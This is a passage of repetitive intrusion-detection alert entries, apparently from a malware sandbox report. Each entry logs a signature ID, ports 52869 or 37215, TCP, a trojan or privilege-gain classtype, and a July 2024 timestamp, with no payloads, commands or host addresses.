                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2027339
                      Source Port:55062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.651912
                      SID:2831300
                      Source Port:35654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.028316
                      SID:2025132
                      Source Port:60440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.222978
                      SID:2025132
                      Source Port:38392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2829579
                      Source Port:34208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.111043
                      SID:2027339
                      Source Port:37016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2829579
                      Source Port:58342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.447286
                      SID:2027339
                      Source Port:42194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.630703
                      SID:2829579
                      Source Port:33210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.266946
                      SID:2025132
                      Source Port:42504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.206220
                      SID:2025132
                      Source Port:37142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.097135
                      SID:2835222
                      Source Port:55036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.595072
                      SID:2831300
                      Source Port:57374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.213768
                      SID:2831300
                      Source Port:43116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:41408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.092575
                      SID:2025132
                      Source Port:45468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2831300
                      Source Port:52838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:42692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314147
                      SID:2027339
                      Source Port:47166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.474339
                      SID:2025132
                      Source Port:51252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2027339
                      Source Port:42052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.519802
                      SID:2027339
                      Source Port:40966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.442442
                      SID:2027339
                      Source Port:55828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.320338
                      SID:2831300
                      Source Port:41898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.293475
                      SID:2027339
                      Source Port:48050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2835222
                      Source Port:38304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645186
                      SID:2829579
                      Source Port:50596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.914137
                      SID:2831300
                      Source Port:34970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.607132
                      SID:2027339
                      Source Port:46434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.326982
                      SID:2831300
                      Source Port:48746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:33326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286262
                      SID:2027339
                      Source Port:32930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.147840
                      SID:2027339
                      Source Port:34522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.049337
                      SID:2027339
                      Source Port:56952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.553447
                      SID:2025132
                      Source Port:48814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.303455
                      SID:2025132
                      Source Port:42292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.571884
                      SID:2027339
                      Source Port:50062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.464382
                      SID:2027339
                      Source Port:60510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.550538
                      SID:2831300
                      Source Port:38384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:12.234515
                      SID:2027339
                      Source Port:55384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2835222
                      Source Port:60908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.845332
                      SID:2027339
                      Source Port:36896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.846382
                      SID:2025132
                      Source Port:33600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.525064
                      SID:2025132
                      Source Port:38412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:01.357047
                      SID:2027339
                      Source Port:34792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.788008
                      SID:2025132
                      Source Port:41078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.487978
                      SID:2027339
                      Source Port:40330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.082339
                      SID:2025132
                      Source Port:36074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.742663
                      SID:2027339
                      Source Port:60010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.288217
                      SID:2831300
                      Source Port:48756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2835222
                      Source Port:37572
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2829579
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2829579
                      Source Port:44748
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.706302
                      SID:2025132
                      Source Port:39534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.083998
                      SID:2025132
                      Source Port:60718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.781934
                      SID:2025132
                      Source Port:45326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.944006
                      SID:2831300
                      Source Port:43396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2829579
                      Source Port:57796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2835222
                      Source Port:56512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2829579
                      Source Port:39424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2829579
                      Source Port:49060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.420081
                      SID:2025132
                      Source Port:45666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.258403
                      SID:2027339
                      Source Port:33898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2835222
                      Source Port:57922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.412385
                      SID:2025132
                      Source Port:38334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2835222
                      Source Port:51996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2829579
                      Source Port:50524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221223
                      SID:2829579
                      Source Port:44052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.988229
                      SID:2025132
                      Source Port:37986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:41766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.228026
                      SID:2835222
                      Source Port:55100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.165780
                      SID:2831300
                      Source Port:44556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.592707
                      SID:2027339
                      Source Port:60594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.275004
                      SID:2027339
                      Source Port:59572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.028836
                      SID:2829579
                      Source Port:35218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.709103
                      SID:2027339
                      Source Port:44902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:48482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.366269
                      SID:2027339
                      Source Port:48042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2829579
                      Source Port:44950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650037
                      SID:2835222
                      Source Port:36456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.236294
                      SID:2027339
                      Source Port:55250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2829579
                      Source Port:39940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053604
                      SID:2829579
                      Source Port:54380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974569
                      SID:2835222
                      Source Port:59904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2831300
                      Source Port:49174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.300183
                      SID:2831300
                      Source Port:34640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.653309
                      SID:2829579
                      Source Port:49318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.303455
                      SID:2027339
                      Source Port:44668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.491060
                      SID:2027339
                      Source Port:56394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2835222
                      Source Port:59032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.060344
                      SID:2835222
                      Source Port:52456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:36518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2829579
                      Source Port:43512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317668
                      SID:2027339
                      Source Port:35010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2835222
                      Source Port:37146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.186066
                      SID:2025132
                      Source Port:49882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.311885
                      SID:2831300
                      Source Port:47082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.604426
                      SID:2831300
                      Source Port:48060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.670285
                      SID:2027339
                      Source Port:55610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.263099
                      SID:2027339
                      Source Port:33996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.059767
                      SID:2829579
                      Source Port:47416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.324972
                      SID:2831300
                      Source Port:46594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.831747
                      SID:2027339
                      Source Port:37044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.392835
                      SID:2027339
                      Source Port:51270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:53310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2835222
                      Source Port:36574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.535708
                      SID:2025132
                      Source Port:41514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2829579
                      Source Port:41924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2829579
                      Source Port:55094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:47260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2835222
                      Source Port:45886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2829579
                      Source Port:34208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.236014
                      SID:2027339
                      Source Port:60634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.181357
                      SID:2831300
                      Source Port:38326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.320338
                      SID:2027339
                      Source Port:57134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2829579
                      Source Port:32978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2835222
                      Source Port:52048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.213822
                      SID:2027339
                      Source Port:60830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2829579
                      Source Port:56934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.931025
                      SID:2027339
                      Source Port:40976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:48874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.528109
                      SID:2027339
                      Source Port:58076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974907
                      SID:2835222
                      Source Port:50664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.843278
                      SID:2027339
                      Source Port:50424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.987935
                      SID:2025132
                      Source Port:36258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.159758
                      SID:2831300
                      Source Port:44832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2829579
                      Source Port:49720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.213822
                      SID:2831300
                      Source Port:39442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.654173
                      SID:2835222
                      Source Port:53600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.412156
                      SID:2027339
                      Source Port:48118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082385
                      SID:2835222
                      Source Port:48818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.957555
                      SID:2831300
                      Source Port:41402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.594415
                      SID:2027339
                      Source Port:44100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.091220
                      SID:2025132
                      Source Port:58794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.114134
                      SID:2027339
                      Source Port:60424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2027339
                      Source Port:37616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.117066
                      SID:2829579
                      Source Port:59010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.593869
                      SID:2025132
                      Source Port:56606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.085571
                      SID:2027339
                      Source Port:47840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.671155
                      SID:2831300
                      Source Port:49994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2835222
                      Source Port:55162
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.596402
                      SID:2027339
                      Source Port:51192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.881105
                      SID:2027339
                      Source Port:33492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.443693
                      SID:2027339
                      Source Port:58424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.625240
                      SID:2027339
                      Source Port:49526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.147840
                      SID:2831300
                      Source Port:59216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.652628
                      SID:2027339
                      Source Port:35362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:58502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.944701
                      SID:2027339
                      Source Port:42188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633355
                      SID:2835222
                      Source Port:59428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2829579
                      Source Port:39682
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.722890
                      SID:2027339
                      Source Port:44964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.599519
                      SID:2831300
                      Source Port:49644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.300793
                      SID:2027339
                      Source Port:47466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.390301
                      SID:2025132
                      Source Port:51446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:06.680685
                      SID:2831300
                      Source Port:54018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.599361
                      SID:2831300
                      Source Port:36014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2829579
                      Source Port:32994
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2835222
                      Source Port:48318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.147883
                      SID:2025132
                      Source Port:34030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.829810
                      SID:2025132
                      Source Port:46942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.014458
                      SID:2835222
                      Source Port:59218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.445925
                      SID:2027339
                      Source Port:43088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.560666
                      SID:2027339
                      Source Port:41116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.060408
                      SID:2831300
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.918065
                      SID:2027339
                      Source Port:43488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2829579
                      Source Port:38786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976984
                      SID:2835222
                      Source Port:40258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.768078
                      SID:2027339
                      Source Port:60488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:42938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.462291
                      SID:2027339
                      Source Port:39952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.979093
                      SID:2025132
                      Source Port:47772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.371741
                      SID:2831300
                      Source Port:41426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.085431
                      SID:2829579
                      Source Port:53176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.790169
                      SID:2831300
                      Source Port:37528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.059102
                      SID:2027339
                      Source Port:57892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:34160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:38506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.290547
                      SID:2027339
                      Source Port:38308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.934101
                      SID:2027339
                      Source Port:34730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
